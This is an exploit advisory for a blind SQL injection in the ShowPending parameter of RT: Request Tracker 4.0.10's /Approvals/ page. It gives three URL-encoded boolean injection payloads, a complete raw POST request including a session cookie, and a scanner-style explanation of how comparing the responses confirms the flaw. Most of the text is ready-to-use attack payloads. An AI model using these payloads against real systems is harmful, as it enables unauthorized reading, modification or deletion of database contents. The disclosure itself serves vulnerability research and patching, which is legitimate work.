# Exploit Title: - SQL-Injection - RT: Request Tracker System
# Date: 10/05/2013
# Exploit Author: cheki
# Vendor Homepage: http://bestpractical.com/rt/
# Version: RT 4.0.10
# Tested on: Kali Linux
########################################################################################
URL: http://10.10.10.70/Approvals/
Entity: ShowPending (Parameter)
Risk: It is possible to view, modify or delete database entries and tables
Causes: Sanitation of hazardous characters was not performed correctly on user input
Fix: Review possible solutions for hazardous character injection
#Description: Blind SQL Injection: append Boolean True/False string expressions, using apostrophes
and commenting out the rest of the query.
#The following changes were applied the original request
1) Set parameter 'ShowPending's value to '1%27+and+%27f%27%3D%27f%27%29+--+'
2) Set parameter 'ShowPending's value to '1%27+and+%27b%27%3D%27f%27%29+--'
3) Set parameter 'ShowPending's value to '1%27+or+%27b%27%3D%27f%27%29+--'
POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://10.10.10.70/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120
ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=
#########################################################################################
Reasoning: The test result seems to indicate a vulnerability because it shows that values
can be appended to parameter values, indicating that they were embedded in an SQL query.HEX(0D)HEX(0A)In
this test, three (or sometimes four) requests are sent. The last is logically equal to the original, and the
nexttolast is different. Any others are for control purposes. A comparison of the last two responses with
the first (the last is similar to it, and the nexttolast is different) indicates that the application is vulnerable.
Home Page: securitylabnews.blogspot.com
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information